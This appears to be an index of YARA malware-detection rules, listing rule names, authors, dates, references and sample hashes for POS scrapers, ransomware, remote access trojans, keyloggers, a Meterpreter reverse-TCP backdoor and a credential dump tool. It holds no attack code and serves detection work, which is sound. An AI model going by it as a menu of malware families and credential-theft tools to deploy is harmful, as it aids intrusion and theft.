malware_index TreasureHunt author: Minerva Labs ref: http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed date: 2016/06 maltype: Point of Sale (POS) Malware filetype: exe
malware_index urausy_skype_dat author: AlienVault Labs description: Yara rule to match against memory of processes infected by Urausy skype.dat
malware_index VidgrabStrings description: Vidgrab Identifying Strings author: Seth Hardy last_modified: 2014-06-20
malware_index Vidgrab description: Vidgrab author: Seth Hardy last_modified: 2014-06-20
malware_index Wabot author: Kevin Falcoz date: 14/08/2015 description: Wabot Trojan Worm
malware_index WarpCode description: Warp code features author: Seth Hardy last_modified: 2014-07-10
malware_index WarpStrings description: Warp Identifying Strings author: Seth Hardy last_modified: 2014-07-10
malware_index Warp description: Warp author: Seth Hardy last_modified: 2014-07-10
malware_index WimmieShellcode description: Wimmie code features author: Seth Hardy last_modified: 2014-07-17
malware_index WimmieStrings description: Strings used by Wimmie author: Seth Hardy last_modified: 2014-07-17
malware_index Wimmie description: Wimmie family author: Seth Hardy last_modified: 2014-07-17
malware_index XMRIG_Miner ref: https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e
malware_index XOR_DDosv1 author: Akamai CSIRT description: Rule to detect XOR DDos infection
malware_index YayihCode description: Yayih code features author: Seth Hardy last_modified: 2014-07-11
malware_index YayihStrings description: Yayih Identifying Strings author: Seth Hardy last_modified: 2014-07-11
malware_index Yayih description: Yayih author: Seth Hardy last_modified: 2014-07-11
malware_index Zegost author: Kevin Falcoz date: 10/06/2013 description: Zegost Trojan
malware_index Windows_Malware_Zeus author: Xylitol xylitol@malwareint.com date: 2014-03-03 description: Match first two bytes, protocol and string present in Zeus 1.1.3.4 reference: http://www.xylibox.com/2014/03/zeus-1134.html
malware_index viotto_keylogger
malware_index xDedic_SysScan_unpacked author: Kaspersky Lab ref: https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdf maltype: crimeware type: crimeware filetype: Win32 EXE date: 2016-03-14 version: 1.0 hash: F661b50d45400e7052a2427919e2f777
malware_index DeltaCharlie copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index IndiaAlfa_One copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index IndiaBravo_PapaAlfa copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index IndiaBravo_RomeoCharlie copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: 58ad28ac4fb911abb6a20382456c4ad6fe5c8ee5.ex_ Status: Signature is too loose to be useful.
malware_index IndiaBravo_RomeoBravo copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: 6e3db4da27f12eaba005217eba7cd9133bc258c97fe44605d12e20a556775009
malware_index IndiaBravo_generic copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index IndiaCharlie_One copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index IndiaCharlie_Two copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index LimaCharlie copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source_x86: 6ee6ae79ee1502a11ece81e971a54f189a271be9ec700101a2bd7a21198b94c7 Source_x64: 90ace24eb132c776a6d5bb0451437db21e84601495a2165d75f520af637e71e8
malware_index PapaAlfa copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index RomeoCharlie copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: a82108ef7115931b3fbe1fab99448c4139e22feda27c1b1d29325710671154e8
malware_index RomeoEcho copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index RomeoFoxtrot copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: dropped.bin Source_relativeCalls: 635bebe95671336865f8a546f06bf67ab836ea35795581d8a473ef2cd5ff4a7f
malware_index SierraBravo_packed copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index SierraCharlie copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: f4750e1d82b08318bdc1eb6d3399dee52750250f7959a5e4f83245449f399698.bin
malware_index RomeoJuliettMikeTwo copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: 819722ba1c5b9d0b360c54cbdd3811d0cac1a9230720b3ed4815f78bcacb3653_d1ba9ba2987f59d99ce4bf09393c0521c4d1f2961c5aeed4e0bf86e78303d27c
malware_index TangoAlfa copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index WhiskeyAlfa copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: 1c66e67a8531e3ff1c64ae57e6edfde7bef2352d.ex_
malware_index WhiskeyDelta copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group trig@novetta.com Source: 41badf10ef6f469dd1c3be201aba809f9c42f86ad77d7f83bc3895bfa289c635
malware_index Lightweight_Backdoor1
malware_index LightweightBackdoor2
malware_index LightweightBackdoor3
malware_index LightweightBackdoor4
malware_index LightweightBackdoor5
malware_index LightweightBackdoor6
malware_index ProxyTool1
malware_index ProxyTool2
malware_index ProxyTool3
malware_index DestructiveTargetCleaningTool5
malware_index DestructiveTargetCleaningTool6
malware_index DestructiveTargetCleaningTool7
malware_index Malwareusedbycyberthreatactor1
malware_index Malwareusedbycyberthreatactor2
malware_index Malwareusedbycyberthreatactor3
malware_index wiper_unique_strings copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com company: novetta
malware_index wiper_encoded_strings copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com company: novetta
malware_index createP2P copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index dump_tool author: @patrickrolsen reference: Related to pwdump6 and fgdump tools
malware_index misc_pos author: @patrickrolsen reference: POS Malware
malware_index unknown author: @patrickrolsen reference: Unknown POS
malware_index regex_pos author: @patrickrolsen reference: POS malware - Regex
malware_index regexpr_pos author: @patrickrolsen reference: POS malware - RegExpr
malware_index reg_pos author: @patrickrolsen reference: POS malware - RegExpr
malware_index sets_pos author: @patrickrolsen reference: POS malware - Sets
malware_index monitor_tool_pos author: @patrickrolsen reference: POS malware - Monitoring Tool??
malware_index keyfinder_tool author: @patrickrolsen reference: Magical Jelly Bean KeyFinder
malware_index memdump_diablo author: @patrickrolsen reference: Process Memory Dumper - DiabloHorn
malware_index blazingtools author: @patrickrolsen reference: Blazing Tools - http://www.blazingtools.com (Keyloggers)
malware_index sysocmgr author: @patrickrolsen reference: System stand-alone Optional Component Manager - http://support.microsoft.com/kb/222444
malware_index lacy_keylogger author: @patrickrolsen reference: Appears to be a form of keylogger.
malware_index searchinject author: @patrickrolsen reference: Usage: SearchInject <PID1>[PID2][PID3] - It loads Searcher.dll (appears to be hard coded)
malware_index heistenberg_pos author: @patrickrolsen reference: POS Malware
malware_index pos_jack author: @patrickrolsen maltype: Point of Sale (POS) Malware version: 0.1 reference: http://blog.spiderlabs.com/2014/02/jackpos-the-house-always-wins.html date: 2/22/2014
malware_index pos_memory_scrapper_ author: @patrickrolsen maltype: Point of Sale (POS) Malware Memory Scraper version: 0.3 description: POS Memory Scraper date: 01/30/2014
malware_index pos_uploader author: @patrickrolsen maltype: Point of Sale (POS) Malware reference: http://blogs.mcafee.com/mcafee-labs/analyzing-the-target-point-of-sale-malware version: 0.1 description: Testing the base64 encoded file in sys32 date: 01/30/2014
malware_index pos_chewbacca author: @patrickrolsen maltype: Point of Sale (POS) Malware reference: https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware hashes: 21f8b9d9a6fa3a0cd3a3f0644636bf09, 28bc48ac4a92bde15945afc0cee0bd54 version: 0.2 description: Testing the base64 encoded file in sys32 date: 01/30/2014
malware_index BernhardPOS author: Nick Hoffman / Jeremy Humble last_update: 2015-07-14 source: Morphick Inc. description: BernhardPOS Credit Card dumping tool reference: http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morphick md5: e49820ef02ba5308ff84e4c8c12e7c3d score: 70
malware_index easterjackpos author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-09-02 description: Identify JackPOS
malware_index LogPOS author: Morphick Security description: Detects Versions of LogPOS md5: af13e7583ed1b27c4ae219e344a37e2b
malware_index Mozart author: Nick Hoffman - Morphick Inc description: Detects samples of the Mozart POS RAM scraping utility reference: http://securitykitten.github.io/the-mozart-ram-scraper/
malware_index Ransom_CryptXXX_Dropper description: Regla para detectar RANSOM.CRYPTXXX author: CCN-CERT version: 1.0 ref: https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/4002-publicado-el-informe-del-codigo-danino-ransom-cryptxxx.html
malware_index Ransom_CryptXXX_Real description: Regla para detectar Ransom.CryptXXX original author: CCN-CERT version: 1.0 ref: https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/4002-publicado-el-informe-del-codigo-danino-ransom-cryptxxx.html
malware_index legion_777 author: Daxda (https://github.com/Daxda) date: 2016/6/6 description: Detects an UPX-unpacked .777 ransomware binary. ref: https://github.com/Daxda/malware-analysis/tree/master/malware_samples/legion category: Ransomware sample: SHA256: 14d22359e76cf63bf17268cad24bac03663c8b2b8028b869f5cec10fe3f75548
malware_index Ransom_Alpha description: Regla para detectar Ransom.Alpha (posibles falsos positivos) author: CCN-CERT version: 1.0
malware_index Ransom_Alfa description: Regla para detectar W32/Filecoder.Alfa (Posibles falsos positivos) author: CCN-CERT version: 1.0
malware_index cerber3 author: pekeinfo date: 2016-09-09 description: Cerber3
malware_index cerber4 author: pekeinfo date: 2016-09-09 description: Cerber4
malware_index cerber5 author: pekeinfo date: 2016-12-02 description: Cerber5
malware_index Ransom weight: 1 Author: @pekeinfo reference: https://github.com/pekeinfo/DecryptCrypren
malware_index CryptoLocker_set1 author: Christiaan Beek, Christiaan_Beek@McAfee.com date: 2014-04-13 description: Detection of Cryptolocker Samples
malware_index CryptoLocker_rule2 author: Christiaan Beek, Christiaan_Beek@McAfee.com date: 2014-04-14 description: Detection of CryptoLocker Variants
malware_index BackdoorFCKG author: ISG date: 2015-01-20 reference: https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker description: CTB_Locker
malware_index DMALocker Description: Deteccion del ransomware DMA Locker desde la version 1.0 a la 4.0 ref: https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/ Author: SadFud Date: 30/05/2016
malware_index DMALocker4 Description: Deteccion del ransomware DMA Locker version 4.0 ref: https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/ Author: SadFud Date: 30/05/2016 Hash: e3106005a0c026fc969b46c83ce9aeaee720df1bb17794768c6c9615f083d5d1
malware_index Locky_Ransomware description: Detects Locky Ransomware (matches also on Win32/Kuluoz) author: Florian Roth (with the help of binar.ly) reference: https://goo.gl/qScSrE date: 2016-02-17 hash: 5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8
malware_index Locky_Ransomware_2 description: Regla para detectar RANSOM.LOCKY author: CCN-CERT version: 1.0
malware_index Ransom_Petya description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 author: CCN-CERT version: 1.0
malware_index Ransom_Satana description: Regla para detectar Ransom.Satana author: CCN-CERT version: 1.0
malware_index Ransom_Satana_Dropper description: Regla para detectar el dropper de Ransom.Satana author: CCN-CERT version: 1.0
malware_index TeslaCrypt description: Regla para detectar Tesla con md5 author: CCN-CERT version: 1.0
malware_index Win32Toxic author: @GelosSnake date: 2015-06-02 description: https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us hash0: 70624c13be4d8a4c1361be38b49cb3eb hash1: 4f20d25cd3ae2e5c63d451d095d97046 hash2: e0473434cc83b57c4b579d585d4c4c57 hash3: c52090d184b63e5cc71b524153bb079e hash4: 7ac0b49baba9914b234cde62058c96a5 hash5: 048c007de4902b6f4731fde45fa8e6a9 hash6: 238ef3e35b14e304c87b9c62f18953a9 hash7: 8908ccd681f66429c578a889e6e708e1 hash8: de9fe2b7d9463982cc77c78ee51e4d51 hash9: 37add8d26a35a3dc9700b92b67625fa4 hash10: a0f30e89a3431fca1d389f90dba1d56e hash11: d4d0658302c731003bf0683127618bd9 hash12: d1d89e1c7066f41c1d30985ac7b569db hash13: 97d52d7281dfae8ff9e704bf30ce2484 hash14: 2cc85be01e86e0505697cf61219e66da hash15: 02ecfb44b9b11b846ea8233d524ecda3 hash16: 703a6ebe71131671df6bc92086c9a641 hash17: df23629b4a4aed05d6a453280256c05a hash18: 07466ff2572f16c63e1fee206b081d11 hash19: 792a1c0971775d32bad374b288792468 hash20: fb7fd5623fa6b7791a221fad463223cd hash21: 83a562aab1d66e5d170f091b2ae6a213 hash22: 99214c8c9ff4653b533dc1b19a21d389 hash23: a92aec198eee23a3a9a145e64d0250ee hash24: e0f7e6b96ca72b9755965b9dac3ce77e hash25: f520fc947a6d5edb87aa01510bee9c8d hash26: 6d7babbe5e438539a9fa2c5d6128d3b4 hash27: 3133c2231fcee5d6b0b4c988a5201da1 hash28: e5b1d198edc413376e0c0091566198e4 hash29: 50515b5a6e717976823895465d5dc684 hash30: 510389e8c7f22f2076fc7c5388e01220 hash31: 60573c945aa3b8cfaca0bdb6dd7d2019 hash32: 394187056697463eba97382018dfe151 hash33: 045a5d3c95e28629927c72cf3313f4cd hash34: 70951624eb06f7db0dcab5fc33f49127 hash35: 5def9e3f7b15b2a75c80596b5e24e0f4 hash36: 35a42fb1c65ebd7d763db4abb26d33b0 hash37: b0030f5072864572f8e6ba9b295615fc hash38: 62706f48689f1ba3d1d79780010b8739 hash39: be86183fa029629ee9c07310cd630871 hash40: 9755c3920d3a38eb1b5b7edbce6d4914 hash41: cb42611b4bed97d152721e8db5abd860 hash42: 5475344d69fc6778e12dc1cbba23b382 hash43: 8c1bf70742b62dec1b350a4e5046c7b6 hash44: 6a6541c0f63f45eff725dec951ec90a7 hash45: a592c5bee0d81ee127cbfbcb4178afe8 hash46: b74c6d86ec3904f4d73d05b2797f1cc3 hash47: 28d76fd4dd2dbfc61b0c99d2ad08cd8e hash48: fc859ae67dc1596ac3fdd79b2ed02910 hash49: cb65d5e929da8ff5c8434fd8d36e5dfb hash50: 888dd1acce29cd37f0696a0284ab740a hash51: 0e3e231c255a5eefefd20d70c247d5f0 hash52: e5ebe35d934106f9f4cebbd84e04534b hash53: 3b580f1fa0c961a83920ce32b4e4e86d hash54: d807a704f78121250227793ea15aa9c4 hash55: db462159bddc0953444afd7b0d57e783 hash56: 2ed4945fb9e6202c10fad0761723cb0e hash57: 51183ab4fd2304a278e36d36b5fb990c hash58: 65d602313c585c8712ea0560a655ddeb hash59: 0128c12d4a72d14bb67e459b3700a373 hash60: 5d3dfc161c983f8e820e59c370f65581 hash61: d4dd475179cd9f6180d5b931e8740ed6 hash62: 5dd3782ce5f94686448326ddbbac934c hash63: c85c6171a7ff05d66d497ad0d73a51ed hash64: b42dda2100da688243fe85a819d61e2e hash65: a5cf8f2b7d97d86f4d8948360f3db714 hash66: 293cae15e4db1217ea72581836a6642c hash67: 56c3a5bae3cb1d0d315c1353ae67cf58 hash68: c86dc1d0378cc0b579a11d873ac944e7 hash69: 54cef0185798f3ec1f4cb95fad4ddd7c hash70: eb2eff9838043b67e8024ccadcfe1a8f hash71: 78778fe62ee28ef949eec2e7e5961ca8 hash72: e75c5762471a490d49b79d01da745498 hash73: 1564d3e27b90a166a0989a61dc3bd646 hash74: 59ba111403842c1f260f886d69e8757d hash75: d840dfbe52a04665e40807c9d960cccc hash76: 77f543f4a8f54ecf84b15da8e928d3f9 hash77: bd9512679fdc1e1e89a24f6ebe0d5ad8 hash78: 202f042d02be4f6469ed6f2e71f42c04 hash79: 28f827673833175dd9094002f2f9b780 hash80: 0ff10287b4c50e0d11ab998a28529415 hash81: 644daa2b294c5583ce6aa8bc68f1d21f hash82: 1c9db47778a41775bbcb70256cc1a035 hash83: c203bc5752e5319b81cf1ca970c3ca96 hash84: 656f2571e4f5172182fc970a5b21c0e7 hash85: c17122a9864e3bbf622285c4d5503282 hash86: f9e3a9636b45edbcef2ee28bd6b1cfbb hash87: 291ff8b46d417691a83c73a9d3a30cc9 hash88: 1217877d3f7824165bb28281ccc80182 hash89: 18419d775652f47a657c5400d4aef4a3 hash90: 04417923bf4f2be48dd567dfd33684e2 hash91: 31efe902ec6a5ab9e6876cfe715d7c84 hash92: a2e4472c5097d7433b91d65579711664 hash93: 98854d7aba1874c39636ff3b703a1ed1 hash94: 5149f0e0a56b33e7bbed1457aab8763f hash95: 7a4338193ce12529d6ae5cfcbb1019af hash96: aa7f37206aba3cbe5e11d336424c549a hash97: 51cad5d45cdbc2940a66d044d5a8dabf hash98: 85edb7b8dee5b60e3ce32e1286207faa hash99: 34ca5292ae56fea78ba14abe8fe11f06 hash100: 154187f07621a9213d77a18c0758960f hash101: 4e633f0478b993551db22afddfa22262 hash102: 5c50e4427fe178566cada96b2afbc2d4 hash103: 263001ac21ef78c31f4ca7ad2e7f191d hash104: 53fd9e7500e3522065a2dabb932d9dc5 hash105: 48043dc55718eb9e5b134dac93ebb5f6 hash106: ca19a1b85363cfed4d36e3e7b990c8b6 hash107: 41b5403a5443a3a84f0007131173c126 hash108: 6f3833bc6e5940155aa804e58500da81 hash109: 9bd50fcfa7ca6e171516101673c4e795 hash110: 6d52ba0d48d5bf3242cd11488c75b9a7 hash111: c52afb663ff4165e407f53a82e34e1d5 hash112: 5a16396d418355731c6d7bb7b21e05f7 hash113: 05559db924e71cccee87d21b968d0930 hash114: 824312bf8e8e7714616ba62997467fa8 hash115: dfec435e6264a0bfe47fc5239631903c hash116: 3512e7da9d66ca62be3418bead2fb091 hash117: 7ad4df88db6f292e7ddeec7cf63fa2bc hash118: d512da73d0ca103df3c9e7c074babc99 hash119: c622b844388c16278d1bc768dcfbbeab hash120: 170ffa1cd19a1cecc6dae5bdd10efb58 hash121: 3a19c91c1c0baa7dd4a9def2e0b7c3e9 hash122: 3b7ce3ceb8d2b85ab822f355904d47ce hash123: a7bac2ace1f04a7ad440bd2f5f811edc hash124: 66594a62d8c98e1387ec8deb3fe39431 hash125: a1add9e5d7646584fd4140528d02e4c3 hash126: 11328bbf5a76535e53ab35315321f904 hash127: 048f19d79c953e523675e96fb6e417a9 hash128: eb65fc2922eafd62defd978a3215814b hash129: 51cc9987f86a76d75bf335a8864ec250 hash130: a7f91301712b5a3cc8c3ab9c119530ce hash131: de976a5b3d603161a737e7b947fdbb9a hash132: 288a3659cc1aec47530752b3a31c232b hash133: 91da679f417040558059ccd5b1063688 hash134: 4ce9a0877b5c6f439f3e90f52eb85398 hash135: 1f9e097ff9724d4384c09748a71ef99d hash136: 7d8a64a94e71a5c24ad82e8a58f4b7e6 hash137: db119e3c6b57d9c6b739b0f9cbaeb6fd hash138: 52c9d25179bf010a4bb20d5b5b4e0615 hash139: 4b9995578d51fb891040a7f159613a99 sample_filetype: exe yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
malware_index Adzok author: Kevin Breen <kevin@techanarchy.net> Description: Adzok Rat Versions: Free 1.0.0.3, date: 2015/05 ref: http://malwareconfig.com/stats/Adzok maltype: Remote Access Trojan filetype: jar
malware_index BlackShades2 author: Kevin Falcoz date: 26/06/2013 description: BlackShades Server
malware_index BlackShades_4 description: BlackShades author: Jean-Philippe Teissier / @Jipe_ date: 2013-01-12 filetype: memory version: 1.0
malware_index BlackShades author: Kevin Falcoz date: 26/06/2013 description: BlackShades Server
malware_index BlackShades_25052015 author: Brian Wallace (@botnet_hunter) date: 2014/04 ref: http://blog.cylance.com/a-study-in-bots-blackshades-net family: blackshades
malware_index Bolonyokte description: UnknownDotNet RAT - Bolonyokte author: Jean-Philippe Teissier / @Jipe_ date: 2013-02-01 filetype: memory version: 1.0
malware_index Bozok author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Bozok maltype: Remote Access Trojan filetype: exe
malware_index Cerberus description: Cerberus author: Jean-Philippe Teissier / @Jipe_ date: 2013-01-12 filetype: memory version: 1.0
malware_index Crimson author: Kevin Breen <kevin@techanarchy.net> Description: Crimson Rat date: 2015/05 ref: http://malwareconfig.com/stats/Crimson maltype: Remote Access Trojan filetype: jar
malware_index CyberGate author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/CyberGate maltype: Remote Access Trojan filetype: exe
malware_index DarkComet_2 description: DarkComet author: Jean-Philippe Teissier / @Jipe_ date: 2013-01-12 filetype: memory version: 1.0
malware_index DarkComet_3 author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/DarkComet maltype: Remote Access Trojan filetype: exe
malware_index DarkComet_4 reference: https://github.com/bwall/bamfdetect/blob/master/BAMF_Detect/modules/yara/darkcomet.yara
malware_index CSIT_14003_03 Author: CrowdStrike, Inc Date: 2014/05/13 Description: Flying Kitten Installer Reference: http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten
malware_index gh0st author: https://github.com/jackcr/
malware_index gholeeV1 Author: @GelosSnake Date: 2014/08 Description: Gholee first discovered variant Reference: http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html
malware_index MW_gholee_v1 Author: @GelosSnake description: http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html date: 2014-08 maltype: Remote Access Trojan sample_filetype: dll hash0: 48573a150562c57742230583456b4c02
malware_index glassrat author: Brian Wallace @botnet_hunter
malware_index Win32OPCHavex Author: BAE Systems Date: 2014/06/23 Description: Rule for identifying OPC version of HAVEX Reference: www.f-secure.com/weblog/archives/00002718.html
malware_index Win32FertgerHavex Author: BAE Systems Date: 2014/06/23 Description: Rule for identifying Fertger version of HAVEX Reference: www.f-secure.com/weblog/archives/00002718.html
malware_index Havex_Trojan_PHP_Server Author: Florian Roth Date: 2014/06/24 Description: Detects the PHP server component of the Havex RAT Reference: www.f-secure.com/weblog/archives/00002718.html
malware_index Indetectables_RAT description: Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux author: Florian Roth reference: http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/ date: 2015-10-01 super_rule: 1 hash1: 081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105 hash2: 66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229 hash3: 1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801
malware_index Meterpreter_Reverse_Tcp author: chort (@chort0) description: Meterpreter reverse TCP backdoor in memory. Tested on Win7x64.
malware_index NetWiredRC_B description: NetWiredRC author: Jean-Philippe Teissier / @Jipe_ date: 2014-12-23 filetype: memory version: 1.1
malware_index Njrat description: Njrat author: botherder https://github.com/botherder
malware_index njrat1 author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2015-05-27 description: Identify njRat
malware_index win_exe_njRAT author: info@fidelissecurity.com descripion: njRAT - Remote Access Trojan comment: Variants have also been observed obfuscated with .NET Reactor filetype: pe date: 2013-07-15 version: 1.0 hash1: 92ee1fb5df21d8cfafa2b02b6a25bd3b hash2: 3576d40ce18bb0349f9dfa42b8911c3a hash3: 24cc5b811a7f9591e7f2cb9a818be104 hash4: 3ad5fded9d7fdf1c2f6102f4874b2d52 hash5: a98b4c99f64315aac9dd992593830f35 hash6: 5fcb5282da1a2a0f053051c8da1686ef hash7: a669c0da6309a930af16381b18ba2f9d hash8: 79dce17498e1997264346b162b09bde8 hash9: fc96a7e27b1d3dab715b2732d5c86f80 ref1: http://bit.ly/19tlf4s ref2: http://www.fidelissecurity.com/threatadvisory ref3: http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njratuncovered.html ref4: http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf
malware_index network_traffic_njRAT author: info@fidelissecurity.com descripion: njRAT - Remote Access Trojan comment: Rule to alert on network traffic indicators filetype: PCAP - Network Traffic date: 2013-07-15 version: 1.0 hash1: 92ee1fb5df21d8cfafa2b02b6a25bd3b hash2: 3576d40ce18bb0349f9dfa42b8911c3a hash3: 24cc5b811a7f9591e7f2cb9a818be104 hash4: 3ad5fded9d7fdf1c2f6102f4874b2d52 hash5: a98b4c99f64315aac9dd992593830f35 hash6: 5fcb5282da1a2a0f053051c8da1686ef hash7: a669c0da6309a930af16381b18ba2f9d hash8: 79dce17498e1997264346b162b09bde8 hash9: fc96a7e27b1d3dab715b2732d5c86f80 ref1: http://bit.ly/19tlf4s ref2: http://www.fidelissecurity.com/threatadvisory ref3: http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.html ref4: http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf
malware_index PlugXStrings description: PlugX Identifying Strings author: Seth Hardy last_modified: 2014-06-12
malware_index plugX author: Jean-Philippe Teissier / @Jipe_ description: PlugX RAT date: 2014-05-13 filetype: memory version: 1.0 ref1: https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py
malware_index PoisonIvy_2 author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/PoisonIvy maltype: Remote Access Trojan filetype: exe
malware_index AAR author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/AAR maltype: Remote Access Trojan filetype: exe
malware_index Ap0calypse author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Ap0calypse maltype: Remote Access Trojan filetype: exe
malware_index Arcom author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Arcom maltype: Remote Access Trojan filetype: exe
malware_index BlackNix author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/BlackNix maltype: Remote Access Trojan filetype: exe
malware_index BlueBanana author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/BlueBanana maltype: Remote Access Trojan filetype: Java
malware_index ClientMesh author: Kevin Breen <kevin@techanarchy.net> date: 2014/06 ref: http://malwareconfig.com/stats/ClientMesh family: torct
malware_index DarkRAT author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/DarkRAT maltype: Remote Access Trojan filetype: exe
malware_index Greame author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Greame maltype: Remote Access Trojan filetype: exe
malware_index HawkEye author: Kevin Breen <kevin@techanarchy.net> date: 2015/06 ref: http://malwareconfig.com/stats/HawkEye maltype: KeyLogger filetype: exe
malware_index Imminent author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Imminent maltype: Remote Access Trojan filetype: exe
malware_index Infinity author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Infinity maltype: Remote Access Trojan filetype: exe
malware_index JavaDropper author: Kevin Breen <kevin@techanarchy.net> date: 2015/10 ref: http://malwareconfig.com/stats/AlienSpy maltype: Remote Access Trojan filetype: exe
malware_index LostDoor author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/LostDoor maltype: Remote Access Trojan filetype: exe
malware_index LuminosityLink author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/LuminosityLink maltype: Remote Access Trojan filetype: exe
malware_index LuxNet author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/LuxNet maltype: Remote Access Trojan filetype: exe
malware_index NanoCore author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/NanoCore maltype: Remote Access Trojan filetype: exe
malware_index Paradox author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Paradox maltype: Remote Access Trojan filetype: exe
malware_index Plasma author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Plasma maltype: Remote Access Trojan filetype: exe
malware_index PredatorPain author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/PredatorPain maltype: Remote Access Trojan filetype: exe
malware_index Punisher author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Punisher maltype: Remote Access Trojan filetype: exe
malware_index PythoRAT author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/PythoRAT maltype: Remote Access Trojan filetype: exe
malware_index QRat author: Kevin Breen @KevTheHermit date: 2015/08 ref: http://malwareconfig.com maltype: Remote Access Trojan filetype: jar
malware_index SmallNet author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/SmallNet maltype: Remote Access Trojan filetype: exe
malware_index SpyGate author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/SpyGate maltype: Remote Access Trojan filetype: exe
